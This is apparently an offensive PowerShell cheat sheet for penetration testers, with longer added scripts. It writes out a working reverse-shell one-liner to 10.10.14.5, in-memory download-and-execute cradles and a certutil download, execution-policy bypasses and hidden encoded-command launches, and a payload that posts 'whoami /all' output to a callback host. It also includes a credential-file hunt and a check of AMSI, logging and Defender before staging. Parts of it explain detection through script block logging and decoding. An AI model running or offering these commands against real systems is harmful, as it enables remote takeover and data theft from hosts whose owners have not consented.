
PowerShell Cheat Sheet

PowerShell commands for Windows enumeration, download/execution, and offensive one-liners during authorized engagements.

Category: Utilities & Shells | Tags: automation, post-exploitation, powershell, scripting, windows | Updated 2026-06-17

Overview

PowerShell is the default automation and post-exploitation language on Windows. This sheet covers the essentials plus the offensive one-liners you actually use on an engagement: enumeration, file transfer, execution-policy bypasses, and in-memory download-and-run. Prefer built-in cmdlets—they blend into normal admin activity.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Basics & help

Discover cmdlets by keyword

Get-Command *service*

Help with usage examples

Get-Help Get-Process -Examples

Inspect an object's properties/methods

Get-Process | Get-Member

Filter and select (the pipeline core)

Get-Process | Where-Object {$_.CPU -gt 100} | Select-Object Name,CPU

System & user enumeration

Current user, groups, privileges

whoami /all

Local users and admins

Get-LocalUser; Get-LocalGroupMember Administrators

IPs and listening ports

Get-NetIPAddress; Get-NetTCPConnection -State Listen

Installed software (Win32_Product is slow and makes the MSI engine run a consistency check on every package, which is written to the Application log; the registry Uninstall keys are the quiet alternative)

Get-CimInstance Win32_Product | Select Name,Version

Hunt interesting files

Get-ChildItem -Path C:\ -Recurse -Include *.kdbx,*.config,*.xml -ErrorAction SilentlyContinue
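
One pass over the items above, as an added example that is not from the original page: it returns objects rather than loose text, joins listening ports to the owning process, reads installed software from the registry Uninstall keys instead of Win32_Product, and limits the file hunt to a few roots (the roots, extensions and output path are assumptions).

```powershell
# Added example (not from the original page). Host enumeration as one object
# that can be piped to ConvertTo-Json or Export-Csv for the report.
function Get-HostRecon {
    [CmdletBinding()]
    param(
        # Assumed roots; a full C:\ walk is slow and noisy
        [string[]]$SearchRoots = @('C:\Users', 'C:\inetpub', 'C:\ProgramData'),
        [string[]]$Extensions  = @('*.kdbx', '*.config', '*.xml', '*.ps1', '*.txt')
    )

    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # Local administrators (Get-LocalGroupMember needs PowerShell 5.1+)
    $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        Select-Object Name, ObjectClass, PrincipalSource

    # Listening TCP sockets joined to the owning process name.
    # OwningProcess is UInt32, so cast to Int32 to match the hashtable keys.
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_.ProcessName }
    $listen = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            [PSCustomObject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                Pid          = $_.OwningProcess
                Process      = $procs[[int]$_.OwningProcess]
            }
        } | Sort-Object LocalPort

    # Installed software from the 64-bit and 32-bit Uninstall keys (no MSI consistency check)
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    $software = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
        Sort-Object DisplayName -Unique

    # File hunt limited to the given roots
    $files = Get-ChildItem -Path $SearchRoots -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
        Select-Object FullName, Length, LastWriteTime

    [PSCustomObject]@{
        Host        = $env:COMPUTERNAME
        User        = $identity.Name
        IsElevated  = $isAdmin
        LocalAdmins = $admins
        Listening   = $listen
        Software    = $software
        Files       = $files
    }
}

# Usage: collect once, look at the ports, keep a JSON copy for the report
$recon = Get-HostRecon
$recon.Listening | Format-Table -AutoSize
$recon | ConvertTo-Json -Depth 4 | Out-File "$env:TEMP\recon.json"
```

Running it once and working from the saved object is quieter than re-running individual cmdlets; every call above is a read, so nothing changes on the host.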

Execution policy & bypass

Run a script bypassing execution policy

powershell -ep bypass -f script.ps1

No-profile, hidden window, base64 command

powershell -nop -w hidden -enc <base64>

Bypass for the current session only

Set-ExecutionPolicy -Scope Process Bypass

Download & execute

Download a file (Invoke-WebRequest; -UseBasicParsing avoids the "Internet Explorer engine is not available" failure on PowerShell 5.1)

iwr http://10.10.14.5/nc.exe -OutFile C:\Windows\Temp\nc.exe -UseBasicParsing

Download and run a script in memory (no disk)

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/p.ps1')

Modern download-cradle variant

Invoke-RestMethod http://10.10.14.5/x.ps1 | iex

LOLBIN download (non-PowerShell fallback)

certutil -urlcache -split -f http://10.10.14.5/f.exe f.exe
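
The cradles above run whatever the server hands back. The following is an added example, not code from the original page: a download step that goes through the system proxy with the current user's credentials, forces TLS 1.2 on older hosts, and refuses to write or execute anything whose SHA-256 differs from the hash you computed on the staging box. The server, file names and hash values are assumptions.

```powershell
# Added example (not from the original page). Proxy-aware, hash-checked download
# and in-memory cradle. Hashes are computed beforehand on the attacker's host
# (Get-FileHash on Windows, sha256sum on Linux).

# Inherit the system proxy and the logged-on user's credentials for it
$proxy = [Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
[Net.WebRequest]::DefaultWebProxy = $proxy
# Older .NET defaults to TLS 1.0, which most stagers no longer accept
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)][string]$Uri,
        [Parameter(Mandatory)][string]$OutFile,
        [Parameter(Mandatory)][string]$Sha256
    )
    # -UseBasicParsing sidesteps the IE-engine dependency on PowerShell 5.1
    Invoke-WebRequest -Uri $Uri -OutFile $OutFile -UseBasicParsing -ErrorAction Stop
    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($actual -ne $Sha256) {          # -ne is case-insensitive, so hex case does not matter
        Remove-Item -Path $OutFile -Force
        throw "Hash mismatch for $Uri : expected $Sha256, got $actual"
    }
    Get-Item -Path $OutFile
}

function Invoke-VerifiedCradle {
    param(
        [Parameter(Mandatory)][string]$Uri,
        [Parameter(Mandatory)][string]$Sha256
    )
    # Fetch raw bytes so the hash matches the file on the staging host byte for byte
    $wc = New-Object Net.WebClient
    $wc.Proxy = [Net.WebRequest]::DefaultWebProxy
    $bytes  = $wc.DownloadData($Uri)
    $sha    = [Security.Cryptography.SHA256]::Create()
    $actual = [BitConverter]::ToString($sha.ComputeHash($bytes)) -replace '-', ''
    if ($actual -ne $Sha256) { throw "Hash mismatch for $Uri : got $actual" }
    # Decode and drop a UTF-8 BOM if the file was saved with one.
    # Nothing here hides the script from AMSI or script block logging.
    $text = [Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    Invoke-Expression $text
}

# Usage with placeholder hashes (assumed values; replace with the real ones)
Get-VerifiedFile -Uri 'http://10.10.14.5/nc.exe' -OutFile "$env:TEMP\nc.exe" `
    -Sha256 'REPLACE_WITH_SHA256_FROM_STAGING_HOST'
Invoke-VerifiedCradle -Uri 'http://10.10.14.5/p.ps1' -Sha256 'REPLACE_WITH_SHA256_FROM_STAGING_HOST'
```

The check matters on engagements as much as anywhere else: a captive portal or an inline proxy can answer a plain HTTP request with its own HTML page, and an unchecked cradle would pipe that straight into Invoke-Expression.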

Quick one-liners

PowerShell reverse shell

$c=New-Object Net.Sockets.TCPClient('10.10.14.5',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([text.encoding]::ASCII).GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()}

Base64-encode a command for -enc

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami'))

Decode a base64 PowerShell command

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('<b64>'))
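
The execution-policy section and the two one-liners above do the encoding and decoding by hand. As an added example that is not from the original page, this packages both directions: it builds a -enc argument from a multi-line script (which avoids every quoting problem) and pulls the script back out of a process command line as a responder would see it in a 4688 or Sysmon event 1 record. The callback host, the script body and the log line are constructed for illustration.

```powershell
# Added example (not from the original page): round-trip for -EncodedCommand.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # -enc expects base64 over UTF-16LE bytes; encoding UTF-8 produces garbage
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Match the blob after -e, -ec, -enc or -encodedcommand (PowerShell accepts prefixes);
    # -ep and -ExecutionPolicy do not match because a space must follow the switch
    $m = [regex]::Match($CommandLine, '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { throw 'No encoded command found in the command line' }
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
}

# Multi-line payload; the here-string keeps the quotes exactly as written
$payload = @'
$out = whoami /all | Out-String
Invoke-RestMethod -Uri 'http://10.10.14.5/cb' -Method Post -Body $out
'@

$enc = ConvertTo-EncodedCommand -Script $payload
$cmd = "powershell.exe -nop -w hidden -enc $enc"
Write-Output $cmd

# Constructed log excerpt showing the same command as a responder would see it
$logLine = 'CommandLine: powershell.exe -nop -w hidden -enc ' + $enc
ConvertFrom-EncodedCommand -CommandLine $logLine   # prints the two lines of $payload
```

Note that encoding is not concealment: the decoder above is three lines, and script block logging (event 4104) records the decoded script regardless of how it was launched.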

Run as another user with stored creds (the plaintext password sits in the command line, the console history and any script block log)

$p=ConvertTo-SecureString 'Pass' -AsPlainText -Force;$cr=New-Object Management.Automation.PSCredential('corp\admin',$p);Start-Process cmd -Credential $cr

Recursively search files for a string

Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-String -Pattern 'password'

Tips

  • -nop -w hidden -enc is the classic stealth combo: no profile, hidden window, encoded command.
  • IEX download-cradles keep the payload off disk, which defeats file-based scanning; they do not defeat AMSI, which scans the string handed to IEX, or script block logging, which records it.
  • AMSI and Constrained Language Mode block many payloads on hardened hosts. Check $ExecutionContext.SessionState.LanguageMode before staging anything: FullLanguage means the host is unrestricted, ConstrainedLanguage means .NET method calls and Add-Type are off limits.
  • Get-Member is your best friend — it shows what you can do with any object in the pipeline.
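
A read-only preflight for the controls these tips mention, as an added example that is not from the original page: it reports language mode, effective execution policies, whether amsi.dll is loaded in the current process, the script block, module and transcription logging policy values, and whether the AppLocker service and Defender real-time protection are running. The registry paths are the documented PowerShell policy locations; nothing in it changes a setting.

```powershell
# Added example (not from the original page): report the defensive posture
# of the current host before launching anything.
function Get-PSDefensePosture {
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Reads one DWORD under the PowerShell policy key; 'not configured' when absent
    function Get-PolicyValue([string]$SubKey, [string]$Name) {
        $item = Get-ItemProperty -Path (Join-Path $policyRoot $SubKey) -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { 'not configured' } else { [bool]$item.$Name }
    }

    $loadedModules = (Get-Process -Id $PID).Modules | Select-Object -ExpandProperty ModuleName
    $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()

    # Defender cmdlets are absent on hosts without the Defender module
    $defender = if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        (Get-MpComputerStatus -ErrorAction SilentlyContinue).RealTimeProtectionEnabled
    } else { 'n/a' }

    [PSCustomObject]@{
        PSVersion          = $PSVersionTable.PSVersion.ToString()
        Elevated           = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
        ExecutionPolicy    = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join ' '
        AmsiLoaded         = $loadedModules -contains 'amsi.dll'
        ScriptBlockLogging = Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ModuleLogging      = Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging'
        Transcription      = Get-PolicyValue 'Transcription' 'EnableTranscripting'
        AppLockerService   = (Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue).Status
        DefenderRealTime   = $defender
    }
}

Get-PSDefensePosture | Format-List
```

AmsiLoaded is true on any PowerShell 5.1 or later session, so the interesting fields are LanguageMode and the three logging values: ConstrainedLanguage with script block logging on means a cradle will both fail and be recorded.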
